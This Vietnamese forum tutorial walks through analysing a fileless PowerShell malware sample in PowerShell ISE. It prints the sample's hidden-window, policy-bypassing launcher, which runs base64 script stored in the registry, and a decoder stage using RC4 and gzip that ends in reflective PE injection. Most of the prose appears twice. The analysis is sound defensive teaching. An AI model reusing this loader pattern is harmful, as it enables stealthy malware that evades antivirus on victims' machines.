Hướng dẫn phân tích virus Powershell
Powershell là một ngôn ngữ scrip xây dựng trên nền .NET. Nó giúp người quản trị dễ dàng quản trị hệ thống thông qua các dòng lệnh rất ngắn ngọn.
Trước đây, tại sao virus lại được code nhiều bởi ngôn ngữ C++. Bởi vì, C++ dễ dàng tác động sâu vào hệ thống, hơn nữa C++ chạy được trên tất cả các hệ điều hành mà không cần bộ cài đặt kèm theo. Tuy nhiên, hiện PowerShell, C# cũng mặc định đã có từ Windows 7 trở nên (Vista có không nhỉ?) nên virus code bằng 2 ngôn ngữ này đang trở nên phổ biến.
Đặc biệt các loại virus như đào tiền ảo, tấn công APT... sử dụng PowerShell để tạo ra một dòng virus gọi là fileless (virus không có file) để ẩn dấu tránh sự phát hiện của các antivirus.
Trong bài viết này mình sẽ giới thiệu một mẫu virus cụ thể và cách sử dụng công cụ để phân tích.
Công cụ debug PowerShell?
Windows PowerShell ISE là một công cụ tích hợp sẵn trên Windows có nhiệm vụ read, write, run, debug các script trên môi trường có giao diện.
Cách sử dụng công cụ để phân tích virus?
Mình có một mẫu virus được code bằng PowerShell như sau và mình với các bạn cùng phân tích nhé. Đây là một mẫu fileless mình rà soát được trên một máy tính
Như thấy hình trên, loại virus này hoàn toàn không có file, nó chạy thông qua các script PowerShell được lưu trên registry. Doạn lệnh bên dưới có ý nghĩa: PowerShell.exe sẽ giải mã base64 và thực thi script lưu trong registry HKCU:\Software\Classes\isbCkwI\wXXEsNt
Đi tới registry lưu script, ta thấy nó lưu data dưới dạng base64, giải mã ra chúng ta được đoạn script đẹp như sau
WOW! Nhìn qua đoạn code trên có thể thấy đã được code đẹp rồi, nhưng nhiều và lằng nhằng quá phải không các bạn . Thật ra chúng ta để tý, mình chỉ cần kéo qua xem code từ trên xuống dưới một lượt để có cái nhận định ban đầu: Đoạn code trên cũng chỉ gồm vài function và các biến. Mục đích của chúng là tiếp tục giải mã và thực thi một đoạn code khác. Có nghĩa là đây chỉ là đoạn code giải mã, chúng ta chưa tới được thực sự code virus để biết được mục đích cuối cùng của nó là gì. Nên đoạn này chúng ta chỉ đi nhanh để tìm code giải mã.
Tới đây, chúng ta thực sự phải dùng công cụ WindowsPowerShell ISE để debug các bạn nhé. Để bật công cụ chúng ta vào Start -> powershell_ise -> Open file code ở trên
Đây là giao diện chính của công cụ debug PowerShell.
Nó gồm 3 phần chính:
Mục đích của đoạn trên là tìm code giải mã, nên chúng ta đặt breakpoint tới biến cuối cùng là biến $KALCTJCDPMCDGXTSP
Như hình trên chúng ta thấy biến $KALCTJCDPMCDGXTSP sau khi giải mã xong sẽ được một đoạn script khác và thực thi nó. Để xem được script nào chúng ta phải chỉ chuột vào nó. Công cụ debug này có một nhược điểm là không copy được giá trị biến. Để tiện theo dõi và sử dụng lại những biến quan trọng mình thường lưu nó ra file. Như trong ví dụ này, biến $KALCTJCDPMCDGXTSP là rất quan trọng. Mình sẽ lưu nó ra file bằng lệnh sau: "$KALCTJCDPMCDGXTSP | Out-File c:\debug.txt". Cách khác, các bạn có thể cho biến đó và copy paste . Mình thì hay dùng cách 1 hơn vì đối với những biến kiểu mảng byte thì việc lưu ra file để view hex sẽ dễ dàng hơn, nhất là một PE file.
Dưới đây là toàn bộ code phần này. Tuy nó hơi dài nhưng khá hay, các bạn chịu khó đọc xem nó làm những gì nhé
https://drive.google.com/file/d/1alQdSpW-lzSVcrAAE1ZR4VQEZyr3qhoe/view?usp=sharing
Mục đích trình của đoạn code trên là đi inject một PE file. Mình sẽ dừng ở đây. Các bạn có thể tự làm tiếp xâu ghép các đoạn code để debug hiểu được bản chất nhé, nhiệm vụ tiếp theo nếu các bạn hứng thú là xâu chuỗi các đoạn code trên để tìm được PE file của virus nhé . Chúc các bạn may mắn!
Trước đây, tại sao virus lại được code nhiều bởi ngôn ngữ C++. Bởi vì, C++ dễ dàng tác động sâu vào hệ thống, hơn nữa C++ chạy được trên tất cả các hệ điều hành mà không cần bộ cài đặt kèm theo. Tuy nhiên, hiện PowerShell, C# cũng mặc định đã có từ Windows 7 trở nên (Vista có không nhỉ?) nên virus code bằng 2 ngôn ngữ này đang trở nên phổ biến.
Đặc biệt các loại virus như đào tiền ảo, tấn công APT... sử dụng PowerShell để tạo ra một dòng virus gọi là fileless (virus không có file) để ẩn dấu tránh sự phát hiện của các antivirus.
Trong bài viết này mình sẽ giới thiệu một mẫu virus cụ thể và cách sử dụng công cụ để phân tích.
Công cụ debug PowerShell?
Windows PowerShell ISE là một công cụ tích hợp sẵn trên Windows có nhiệm vụ read, write, run, debug các script trên môi trường có giao diện.
Cách sử dụng công cụ để phân tích virus?
Mình có một mẫu virus được code bằng PowerShell như sau và mình với các bạn cùng phân tích nhé. Đây là một mẫu fileless mình rà soát được trên một máy tính
Như thấy hình trên, loại virus này hoàn toàn không có file, nó chạy thông qua các script PowerShell được lưu trên registry. Doạn lệnh bên dưới có ý nghĩa: PowerShell.exe sẽ giải mã base64 và thực thi script lưu trong registry HKCU:\Software\Classes\isbCkwI\wXXEsNt
Mã:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\isbCkwI').wXXEsNt)));
Đi tới registry lưu script, ta thấy nó lưu data dưới dạng base64, giải mã ra chúng ta được đoạn script đẹp như sau
Mã:
$IGBUKaxyYYYKSP = 'isbCkwI';
$MTMTBBCSSWA = '{8717F5D4-034A-47D2-A39B-F45E8D9AC2F4}';
$NPYNSSDHZD = '{3D261031-2DB3-44C7-886B-5F53C4AD8029}';
Function ppBnOyhYliCn{
Param([Parameter( Position = 0, Mandatory = $true )][Byte[]]$TAMOODPZZXDLWDYXUTZ,[Parameter(Position = 1, Mandatory = $true)][Byte[]]$zYdXiQXXKDo)
[Byte[]]$k = New-Object Byte[] 256;
[Byte[]]$s = New-Object Byte[] 256;
for ($i = 0; $i -lt 256; $i++){
$s[$i] = [Byte]$i;
$k[$i] = $zYdXiQXXKDo[$i % $zYdXiQXXKDo.Length];
}
$p = 0;
for ($i = 0; $i -lt 256; $i++){
$p = ($p + $s[$i] + $k[$i]) % 256;
$s[$i],$s[$p] = $s[$p],$s[$i];
}
$i = 0;$p = 0;
for ($c = 0; $c -lt $TAMOODPZZXDLWDYXUTZ.Length; $c++){
$i = ($i + 1) % 256;
$p = ($p + $s[$i]) % 256;
$s[$i],$s[$p] = $s[$p],$s[$i];
[int]$m = ($s[$i] + $s[$p]) % 256;
$TAMOODPZZXDLWDYXUTZ[$c] = $TAMOODPZZXDLWDYXUTZ[$c] -bxor $s[$m];
}
return $TAMOODPZZXDLWDYXUTZ;
}
Function inflatebin{
Param([Parameter( Position = 0, Mandatory = $true )]$TAMOODPZZXDLWDYXUTZ)
$memstream = New-Object System.IO.MemoryStream;
$memstream.Write($TAMOODPZZXDLWDYXUTZ, 0, $TAMOODPZZXDLWDYXUTZ.Length);
$memstream.Seek(0,0) | Out-Null;
$gzstream = New-Object System.IO.Compression.GZipStream($memstream,[IO.Compression.CompressionMode]::Decompress);
$reader = New-Object System.IO.StreamReader($gzstream);
$TAMOODPZZXDLWDYXUTZ = $reader.ReadToEnd();
$reader.close();
return $TAMOODPZZXDLWDYXUTZ;
}
$WQRPEKVSOECTV = [System.Text.Encoding]::ASCII.GetBytes('6Gl5Z25smBBe5');
$KALCTJCDPMCDGXTSP = [System.Convert]::FromBase64String('');
$KALCTJCDPMCDGXTSP = ppBnOyhYliCn -TAMOODPZZXDLWDYXUTZ $KALCTJCDPMCDGXTSP -zYdXiQXXKDo $WQRPEKVSOECTV
$KALCTJCDPMCDGXTSP = inflatebin -TAMOODPZZXDLWDYXUTZ $KALCTJCDPMCDGXTSP
$CMLYYWQUYONYN = 'HKCU:\Software\Classes\' + $IGBUKaxyYYYKSP;
$rUEdhlaILbyqxTaEKA = '';
if ([IntPtr]::Size -eq 8) {
$rUEdhlaILbyqxTaEKA = (Get-ItemProperty -Path $CMLYYWQUYONYN -Name $MTMTBBCSSWA).$MTMTBBCSSWA;
}else{
$rUEdhlaILbyqxTaEKA = (Get-ItemProperty -Path $CMLYYWQUYONYN -Name $NPYNSSDHZD).$NPYNSSDHZD;
}
$rUEdhlaILbyqxTaEKA = ppBnOyhYliCn -TAMOODPZZXDLWDYXUTZ $rUEdhlaILbyqxTaEKA -zYdXiQXXKDo $WQRPEKVSOECTV
#$rUEdhlaILbyqxTaEKA = inflatebin2 -TAMOODPZZXDLWDYXUTZ $rUEdhlaILbyqxTaEKA
$KALCTJCDPMCDGXTSP = $KALCTJCDPMCDGXTSP + 'Invoke-ReflectivePEInjection -PEBytes $rUEdhlaILbyqxTaEKA;'
iex $KALCTJCDPMCDGXTSP;
WOW! Nhìn qua đoạn code trên có thể thấy đã được code đẹp rồi, nhưng nhiều và lằng nhằng quá phải không các bạn . Thật ra chúng ta để tý, mình chỉ cần kéo qua xem code từ trên xuống dưới một lượt để có cái nhận định ban đầu: Đoạn code trên cũng chỉ gồm vài function và các biến. Mục đích của chúng là tiếp tục giải mã và thực thi một đoạn code khác. Có nghĩa là đây chỉ là đoạn code giải mã, chúng ta chưa tới được thực sự code virus để biết được mục đích cuối cùng của nó là gì. Nên đoạn này chúng ta chỉ đi nhanh để tìm code giải mã.
Tới đây, chúng ta thực sự phải dùng công cụ WindowsPowerShell ISE để debug các bạn nhé. Để bật công cụ chúng ta vào Start -> powershell_ise -> Open file code ở trên
Đây là giao diện chính của công cụ debug PowerShell.
Nó gồm 3 phần chính:
- Phần đầu: Dể hiển thị các file code đang debug
- Phần giữa: Hiển thị kết quả các lệnh khi chạy debug.
- Phần cuối: Để giúp chúng ta gõ và thực thi thêm các lệnh trong quá trình debug
- F9: Đặt breakpoint
- F5: Bắt đầu debug (chạy script tới chỗ đặt breakpoint)
- F10: Để chạy từng lệnh, chạy qua 1 hàm
- F11: Để chay vào hàm
Mục đích của đoạn trên là tìm code giải mã, nên chúng ta đặt breakpoint tới biến cuối cùng là biến $KALCTJCDPMCDGXTSP
Như hình trên chúng ta thấy biến $KALCTJCDPMCDGXTSP sau khi giải mã xong sẽ được một đoạn script khác và thực thi nó. Để xem được script nào chúng ta phải chỉ chuột vào nó. Công cụ debug này có một nhược điểm là không copy được giá trị biến. Để tiện theo dõi và sử dụng lại những biến quan trọng mình thường lưu nó ra file. Như trong ví dụ này, biến $KALCTJCDPMCDGXTSP là rất quan trọng. Mình sẽ lưu nó ra file bằng lệnh sau: "$KALCTJCDPMCDGXTSP | Out-File c:\debug.txt". Cách khác, các bạn có thể cho biến đó và copy paste . Mình thì hay dùng cách 1 hơn vì đối với những biến kiểu mảng byte thì việc lưu ra file để view hex sẽ dễ dàng hơn, nhất là một PE file.
Dưới đây là toàn bộ code phần này. Tuy nó hơi dài nhưng khá hay, các bạn chịu khó đọc xem nó làm những gì nhé
https://drive.google.com/file/d/1alQdSpW-lzSVcrAAE1ZR4VQEZyr3qhoe/view?usp=sharing
Mục đích trình của đoạn code trên là đi inject một PE file. Mình sẽ dừng ở đây. Các bạn có thể tự làm tiếp xâu ghép các đoạn code để debug hiểu được bản chất nhé, nhiệm vụ tiếp theo nếu các bạn hứng thú là xâu chuỗi các đoạn code trên để tìm được PE file của virus nhé . Chúc các bạn may mắn!
Chỉnh sửa lần cuối: